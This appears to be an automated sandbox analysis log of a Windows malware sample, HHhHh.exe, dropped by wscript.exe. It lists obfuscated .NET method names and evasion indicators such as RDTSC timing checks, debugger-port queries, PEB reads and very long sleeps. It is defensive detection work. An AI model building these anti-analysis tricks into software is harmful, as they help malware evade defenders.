          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, DnjhEJZrH59805e1tj.cs | High entropy of concatenated method names: 'SYGGNHUmVL', 'LXdGFovu0d', 'AYjY5OuAXO', 'U3xYc5eBy7', 'wC2GZZR7FV', 'roZGRDTMHN', 'xmnGXg2XI6', 'RnBGt9rCjM', 'cHKGs2sIqk', 'n1jGBOexrp'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, kkAjKaMbOgY15BMU2V.cs | High entropy of concatenated method names: 'JMm2ghAvem', 'iGk2w5OfPc', 'M6R2W3DeKD', 'F4M2Valgby', 'ECt23oTK2M', 'iHN2pX8RZ6', 'Qgt2vD7Xkj', 'T4q2E1BaLD', 'MmQ2TokwRg', 'eRv2xlwxnx'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, V7MKVcAbI46kQVW9k0.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lcInupZO1D', 'Mu3nFh3L7M', 'BRKnzs4NOx', 'KLYQ5pkmQr', 'Wp3QcUBnDj', 'zdSQn4ptxD', 'Y7CQQVJfG5', 'aLqoUXMuiZntw6psDqN'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, WsUtYha7JiycjC3Xcp.cs | High entropy of concatenated method names: 'w0gjUe2tOI', 'PH3jgcFpN3', 'stAjWbHEeE', 'lynjVVaT7C', 'YKujp6lk0J', 'QTBjv984Lc', 'g5xjTvLeGG', 'HASjxgvDWa', 'GX9chRYAxXEnBGQhdMu', 'IPtSPWYhEMlNB36dVPo'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, M0EcBdetKyuEBtUKgB.cs | High entropy of concatenated method names: 'l0ikEj2Lep', 'v78kTEMEfN', 'AWWkopxaWE', 'c8tkL0q8bc', 'SkakilwA3e', 'ApkkaIZ2lx', 'hGAk1AkbNt', 'jgDkIW8kKP', 'jHUklm0F08', 'wg1kZ8Kfuy'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, RJwk7uqHNXtymbkcXC.cs | High entropy of concatenated method names: 'qpuGhegov1', 'P0lG0amQZb', 'ToString', 'uQEGdnaGWA', 'JpaG6J7iZx', 'pxoGPSmrOo', 'bE6GOeI4yW', 'Q9QGjQoktb', 'aiWG2C7aKT', 'xUiGyQAPJu'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, PseVlKsl9npQT7AhaE.cs | High entropy of concatenated method names: 'rH6PVcKL9S', 'TMBPpEgTTH', 'kx8PEjIpx0', 'aLEPTHCIe1', 'sLuPCMxjiQ', 'AG6Pqqr1Z0', 'ie7PGPXVp4', 'QnhPYbgHC4', 'lEuPDoYupj', 'VecP4uUd5x'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, SQMUrft2hqvHsrieyT.cs | High entropy of concatenated method names: 'nsijHWqCan', 'fJij6HA0Au', 'MKGjOOZEqt', 'SwTj2x2TYq', 'pyUjyvSeZH', 'RuBOAOncyJ', 'K29OfqLTFT', 'drhOShnKl1', 'kg0ONKQFu5', 'b4WOuhxVgp'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, vOIxEplE8AnWIAfrrt.cs | High entropy of concatenated method names: 'ToString', 'YKvqZ9Goop', 'vX0qLuT45u', 'GeEqeMWeA6', 'e4EqiafFl9', 'mDxqaYNGaY', 'Xm9qmAdeBu', 'sJAq1whoix', 'EukqI6HBrI', 'HbSq9dIHtf'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, odnbvwjktDSWWe4pEj.cs | High entropy of concatenated method names: 'Q6P2dYNQip', 'GuS2PMF6Tm', 'XBv2jdFpPS', 'uotjFqnvRx', 'tJLjzOx77q', 'kO6251bUjq', 'UIV2cj8u5v', 'h582npE2ji', 'YTV2QNF5TQ', 'XVN2Kpepio'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, oY2KAGdktRtY42PnXh.cs | High entropy of concatenated method names: 'kA2Yd8gP25', 'cAHY6N2DwY', 'a8dYPcFklw', 'DuFYOp59ua', 'q3GYjHaxiS', 're9Y2fSQVP', 'zcGYyI2YGC', 'Nw8YbsfNDK', 'OUcYhWmScs', 'zfVY0CyT5r'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, wjoM4miaX9WrPncB9X.cs | High entropy of concatenated method names: 'ryU6t2idBU', 'wRP6sfShS5', 'tk36BJPSxx', 'lB26rMNIhC', 'abv6AtgeWv', 'zee6flAsNF', 'rUt6S5BgqN', 'ij86NxjfM0', 'dBW6uZu38g', 'uEo6FASs9Y'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, MFWBRaSgXAlsGkiGZF.cs | High entropy of concatenated method names: 'Dispose', 'NnpcucFVtC', 'obonL44KC6', 'IKQMMyu2le', 'boxcFKMxtA', 'ndVczSmOZT', 'ProcessDialogKey', 'oHhn5K9QOX', 'I2AncLNJos', 'twlnnZNDKd'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, RWH8U3x1RFh1MUc0ly.cs | High entropy of concatenated method names: 'iqlc2nTSwi', 'utqcy3purM', 'JGFchSgxDD', 'i8Mc0hBG1s', 'KgZcClqVwu', 'HfEcqm7oc6', 'XKRcCaf2M9AknOwyEl', 'kptRfWERWrdWPlC38I', 'mbkcc7glRr', 'CQwcQGkfwF'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, Y86arQv56RqLK7lxN8.cs | High entropy of concatenated method names: 'kFQO3gCMlO', 'xamOvQUS29', 'CmPPepCMVl', 'u7gPiayuAl', 'mihPaPIoHu', 'cVQPmu4GJv', 'VyDP1KiLFq', 'wlVPIjuyar', 'MG6P9FStoT', 'VLcPl21tg9'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, uH6vU8V8hKc8o2xpTyb.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'c934tZZHG1', 'hS24s6MDka', 'POc4BBVJ8k', 'HFu4rZ5RjM', 'ArO4AftYr9', 'ARv4fNniit', 'ist4SYiqE2'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, brnWriW6QiT2akgS1J.cs | High entropy of concatenated method names: 'hmJClC4ZqV', 'haKCRG8Vnt', 'O7aCtpf7MO', 'sXvCs0lLhT', 'DrvCL9ZWph', 'zK2Cem4yYW', 'EfdCi5KEpW', 'qPWCagtlBF', 'eH8CmeKQoG', 'bfVC1bwLcK'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, My7AEnEGgddFOKOHKB.cs | High entropy of concatenated method names: 'RddDc7Dp3Q', 'eR7DQllMGK', 'Sg6DKBqdou', 'iIIDdHLY1w', 'YZuD6pqrBb', 'iytDOvD3HH', 'TPKDjQfDum', 'qJFYSc77sh', 'KhsYNebb0C', 'YkUYu90XaV'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, ObuY3EzelE09x3dtVg.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CtVDkiTWdE', 'w83DCsnkpZ', 'Yh7DqKSY63', 'rYJDG4VWsM', 'JmmDYQiwM4', 'MG7DDUUi1g', 'nX8D4RgTFl'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, zN2gLZkwMSpQA3gaY4.cs | High entropy of concatenated method names: 'cOjYokAUuM', 'PFiYLgvAlR', 'htLYenGmVC', 'SomYiEmMGp', 'FulYtr7KrM', 'J7hYaXJ7Jh', 'Next', 'Next', 'Next', 'NextBytes'
          Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\HHhHh.exe
          Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\wscript.exe -- API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\wscript.exe -- API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\SysWOW64\wscript.exe -- API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\wscript.exe -- API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\wscript.exe -- API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\wscript.exe -- API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\wscript.exe -- API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\wscript.exe -- API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\SysWOW64\wscript.exe -- API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe -- RDTSC instruction interceptor: First address: 909904 second address: 90990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe -- RDTSC instruction interceptor: First address: 909B7E second address: 909B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Memory allocated: 25F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Memory allocated: 26B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Memory allocated: 88C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Memory allocated: 6BB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_00409AB0 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe -- Window found: window name: WSH-Timer
Source: C:\Windows\explorer.exe -- Window / User API: threadDelayed 1808
Source: C:\Windows\explorer.exe -- Window / User API: threadDelayed 8129
Source: C:\Windows\explorer.exe -- Window / User API: foregroundWindowGot 901
Source: C:\Windows\explorer.exe -- Window / User API: foregroundWindowGot 852
Source: C:\Windows\SysWOW64\wscript.exe -- Window / User API: threadDelayed 9842
Source: C:\Windows\explorer.exe -- Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- API coverage: 1.7 %
Source: C:\Windows\SysWOW64\wscript.exe -- API coverage: 1.6 %
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe TID: 5948 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 5836 -- Thread sleep count: 1808 > 30
Source: C:\Windows\explorer.exe TID: 5836 -- Thread sleep time: -3616000s >= -30000s
Source: C:\Windows\explorer.exe TID: 5836 -- Thread sleep count: 8129 > 30
Source: C:\Windows\explorer.exe TID: 5836 -- Thread sleep time: -16258000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 3292 -- Thread sleep count: 132 > 30
Source: C:\Windows\SysWOW64\wscript.exe TID: 3292 -- Thread sleep time: -264000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 3292 -- Thread sleep count: 9842 > 30
Source: C:\Windows\SysWOW64\wscript.exe TID: 3292 -- Thread sleep time: -19684000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe -- Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe -- Code function: 6_2_009C23CE GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose
Source: wscript.exe, 00000000.00000003.2102632040.0000020734E38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2102469274.0000020734DE0000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: bRoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1uWNJ
Source: wscript.exe, 00000000.00000003.2111597853.0000020734DAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2102832884.0000020734D9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110811181.0000020734DAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2111315899.0000020734DAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2111847662.0000020734DB7000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: bRoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1uWNYcmvIf
Source: wscript.exe, 00000000.00000003.2097920261.000002073488B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101278008.00000207348A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094053067.0000020734870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2096800451.000002073488B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093147100.000002073486F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094169799.000002073487B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099646800.000002073489E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094703457.0000020734887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2098729542.0000020734894000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101410771.00000207348A6000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Skj9FIy&&l@&&RUED4yIBH2QL3QujPCxhSjE/ewQcl5gRis#RoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1u
Source: wscript.exe, 00000000.00000003.2121428986.0000020734FA8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123896454.0000020734E45000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: &&RUED4yIBH2QL3QujPCxhSjE/ewQcl5gRisVRoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz
Source: wscript.exe, 00000000.00000003.2082217621.0000020734FE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082784146.0000020734FE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078931964.0000020734FE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2084727269.000002073500C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082523938.0000020734FE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2081423094.0000020734FE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2083329701.0000020734FFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2086044332.000002073500C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2083764851.0000020735001000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088075126.0000020735015000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Skj9FIy&&l@&&RUED4yIBH2QL3QujPCxhSjE/ewQcl5gRis#RoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1uf
Source: wscript.exe, 00000000.00000003.2060374399.0000020734E80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2060900694.0000020734E80000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: s&&4PN9??C+mK0HNkPaoCwMjYUlGvlxufC5sr2znawu??ZTZeUfEZO??1q72pqbYtPDIrvZNLe2#7e3&&??Skj9FIy&&l@&&RUED4yIBH2QL3QujPCxhSjE/ewQcl5gRis#RoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1u??N##ac&&+x#mduMsw0tM4&&1p
Source: wscript.exe, 00000000.00000003.2066616044.000002073485F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2070232121.0000020734864000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069476462.0000020734864000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: s&&4PN9??C+mK0HNkPaoCwMjYUlGvlxufC5sr2znawu??ZTZeUfEZO??1q72pqbYtPDIrvZNLe2#7e3&&??Skj9FIy&&l@&&RUED4yIBH2QL3QujPCxhSjE/ewQcl5gRis#RoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1u??N##ac&&+x#mduMsw0tM4&&1p%
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe -- Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0040ACF0 LdrLoadDll
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012C0124 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01350115 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0133A118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0133A118 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01328158 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01324144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01324144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01296154 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0128C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012D0185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0131019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01334180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0134C188 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0128A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_013661E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012C01F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0130E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0130E1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_013561C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01326030 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0128A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0128C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01314000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01332000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012AE016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012BC073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01316050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01292050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_013560B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_013560B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_013280A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0129208A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012980E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0128A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_013160E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0128C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012D20F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_013120DE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012CA30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0128C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012B0310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0133437C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01338350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0135A352 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0131035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0131035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0128E388 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012B438F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01288397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012A03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012C63FF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012AE3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_013343D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0129A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_012983C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_013163C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0134C3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_0128823B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe -- Code function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128826B mov eax, dword ptr fs:[00000030h]4_2_0128826B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01294260 mov eax, dword ptr fs:[00000030h]4_2_01294260
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01294260 mov eax, dword ptr fs:[00000030h]4_2_01294260
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01294260 mov eax, dword ptr fs:[00000030h]4_2_01294260
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01296259 mov eax, dword ptr fs:[00000030h]4_2_01296259
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01318243 mov eax, dword ptr fs:[00000030h]4_2_01318243
